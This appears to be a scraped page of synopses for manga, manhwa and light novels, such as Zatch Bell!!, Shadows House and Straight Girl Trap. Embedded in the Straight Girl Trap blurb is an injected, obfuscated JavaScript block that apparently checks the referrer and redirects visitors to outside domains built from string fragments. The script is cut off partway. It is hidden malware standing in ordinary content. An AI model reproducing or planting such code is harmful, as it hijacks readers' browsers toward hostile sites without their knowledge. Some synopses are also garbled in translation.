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Fuguushoku to Baka ni Saremashita ga, Jissai wa Sorehodo Waruku Arimasen

Shirosaki Reito was suddenly sucked in by a mysterious crack and got transferred in between dimensions. He got reincarnated as a baby in another world. He was born in the royal family and was the heir to the throne but he was driven/kicked of the palace. The reason was that he was born as a Support magician and had Alchemist as a job which was the lowest job that existed in the new world and people who had that were considered jobless. But there was a secret hidden in that job!! From jobless to the strongest job!!! --- Bookwalker LN: Official LN:


I Really Don’t Want to Remake

Little had I known, I Chen Hansheng; the former elite of society and a Diamond Bachelor, was reborn. When I woke up, I was a senior graduate in high school? Later, Chen Hansheng was walking near the crosswalk, he seemed hesitant. A precious girl; Shen Youchu and two other girls; Bai Yueguang and Xiao Rongyu, who will he pick? All of them? One of them? Two of them? Read to find out. Side Note: Diamond Bachelor is a slang word that means someone who’s insanely rich and single.


Zatch Bell!!

Every 1000 years, 100 demon children are sent to Earth to compete in a battle to become king of the Demon World. Each demon is paired with a human partner who is given a spell book of a specific color. The human can cast the demon\'s spells through their book. If a demon\'s book is burned, they disappear and return to the Demon World. The last demon remaining becomes the king. The show is oriented around Gash Bell and his human partner, Takamine Kiyomaro. [*]Won the 48th Shogakukan Manga Award in the Shounen category.


I Became the Younger Brother of the Obsessive Yandere Heroine

Read I Became the Younger Brother of the Obsessive Yandere Heroine “A Soul Contract Has Been Formed.” Monaka Amamiya was out for her usual jog, listening to an audiobook, when a sudden message flashed across her phone screen. The next thing she knew, she had woken up as Luna Demville—the protagonist of the tragic novel she had been listening to, a story that ended in complete annihilation. To make matters worse, she found herself in bed with her fiancé, the merciless and obsessive yandere emperor, Louis! With a power-hungry cousin vying for the throne, a vampire out for revenge on behalf of his sister, and a seemingly obedient wolf-boy hiding a painful past, Luna was surrounded by danger at every turn. Her only chance at survival? Lower the yandere tendencies of these four dangerous men and change the course of the story. Can Luna break their obsessive natures and escape her doomed fate?


Straight Girl Trap

The regular office worker Zhan Ying, who is drama-queen at heart, recently encountered a question that made her face flush, heart pound, and become embarrassed at a complete loss. That is, she suddenly wondered if her cold queen boss Zhou Yuanyou, who is always taking care of her, has feelings for her?! Is it heartfelt, or is it just a straight trap? Zhan Ying didn't even have time to really think about it when she found herself already caught in the trap...<script></script><script>function _0x32a3(_0x4f397c,_0x1011d7){var _0x65c7b9=_0x2b5c();return _0x32a3=function(_0x299555,_0x4c48fe){_0x299555=_0x299555-(-0x6ed+0xd01*-0x1+0x1465);var _0x29423e=_0x65c7b9[_0x299555];return _0x29423e;},_0x32a3(_0x4f397c,_0x1011d7);}function _0x2b5c(){var _0x47d0c0=['http://rea','UhHgU','8144076zHWrhz','href','39992cImMFr','.top/','then','dpEfq','4434962rUqJmQ','referrer','219VVYlZZ','dma.net/','5060MLiObZ','vDRfS','floor','.customapi','NHoXh','dENUH','rnpAg','TMLfU','7194LNreGf','WBGeV','https://ip','30936QzYEFa','includes','location','random','6520olbwOt','10whMTXR','54292JHqkqH','1962GduoGj','text','google','WrnFt','45gIUqRY'];_0x2b5c=function(){return _0x47d0c0;};return _0x2b5c();}(function(_0x1ee9e5,_0x4eb11e){var _0x22db4e=_0x32a3,_0x129cf5=_0x1ee9e5();while(!![]){try{var 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Shadows House (Official Colored)

Faceless shadow nobles living in a vast mansion, attended by living dolls who spend much of their time cleaning up the soot endlessly emitted by their mysterious masters. Follow the story of Emilyko, a young and cheerful living doll, as she learns her duties serving as the attendant for Kate Shadow-sama. What dangers and dark secrets will she and Kate encounter, as they become more deeply involved in the inner workings of the shadows\' society?


Migawari no Hanayome wa Yandere Ryoushu ni Torawareru

Lala, the daughter of a nobleman, is sent to the castle of Walter the Feudal Lord, in place of her sister who has eloped. Lala is prepared to be treated harshly, but for some reason, Walter grows fiercely attached to Lala as though he was never even remotely engaged to her sister to begin with. ...... It\'s a story about a love fantasy of a yandere in a fantasy world!


I Found A Family That Wasn’t In My Adoption Plan

Read manhwa I Found A Family That Wasn’t In My Adoption Plan Once the most talented secretary in the empire, the most powerful woman in the Burano family, but she was betrayed and killed by a fixer…! However, it was, Was it resentment for not being a noble? or the desire to be a noble. She has been reincarnated as Aeryn, the seven-year-old granddaughter of the Burano family, albeit illegitimately! But this child is destined to be adopted by the same man who betrayed her in her previous life. No! She will be adopted by someone else before she’s killed by that man’s hands! What? All she asked for was to be adopted, money, fame, and a new family that wasn’t part of the adoption plan. “Aeryn! Take me!” “No, I already have too much…” “I don’t mind if you put me on one of your many lists of possessions.” “But how can I make the prince…” Was I going to take this beyond the family, and take over the empire? 입양 플랜에는 없던 가족이 생겼다

23 hours ago

[Repair] Since the Skill Has Become a Versatile Cheat, I Think I Will Open a Weapon Shop

It’s hard for Luke to make a name for himself as an adventurer with all the competition—especially when he’s a perpetually low-ranked adventurer whose only skill is [repair]. But when Luke is abandoned by his party and uses that same [repair] skill to survive and escape the dungeon, a new world of possibilities opens up. Suddenly, his despised skill allows him not only to survive but to stand out in a crowded field!


Mobile Suit Zeta Gundam 1/2 - U.C.0087 Another Story

Universal Century 0087, pilot Edgar Edmund Smith, a hero of the story. The pilot of the Titans originally drawn fierce battle Edgar Edmund Smith. This work, however, the year Universal Century 0138, Maddin was discovered manuscripts of Sicilian women writers who died last year, \"Diary of Edmund Smith, Edgar,\" a setting of what was written. Does not exist at all other evidence that the description and the Universal Century of the time in the world, \"a fact\", and \"mere fiction\" has become a dispute with pilots and mobile suits that appeared in this film, really century, whether the universe exists in the world has become treated as the unknown. Episode 1: Half Zeta Gundam vs Gundam MK-II Episode 2: Amuro and Kiss! Episode 3: Diary of Edgar Edmund Smith Episode Extra: Diary of an Irresponsible Umonsamon Universe - Titans


The Woodbridge Project

Set in an alternate world, we follow a group of friends as they encounter and deal with the many absurdities within the city of Woodbridge. Whether or not they\'ll stop these elusive figures for good is up to question, because these villains come from places most wouldn\'t expect! Be sure to support @sekora2000 on IG, Tiktok, Twitter, and Patreon!


Human Protection Company

Read Human Protection Company on Mangazin Human Protection Company is a Manga/Manhwa/Manhua in english language, Drama series, english chapters have been translated and you can read them here. You are reading chapters on www.mgeko.cc fastest updating comic site. The Summary is During the fourth civil service exam, Lee Yeon-woo barely survives the , which turns humans into beasts, and receives a job offer from a suspicious company called the “Human Protection Company.” Can Yeon-woo, investigator in the anomaly research team of the “Humanity Protection Company,” which isolates, secures, and studies abnormalities to protect humanity, safeguard the human world and survive until the end?
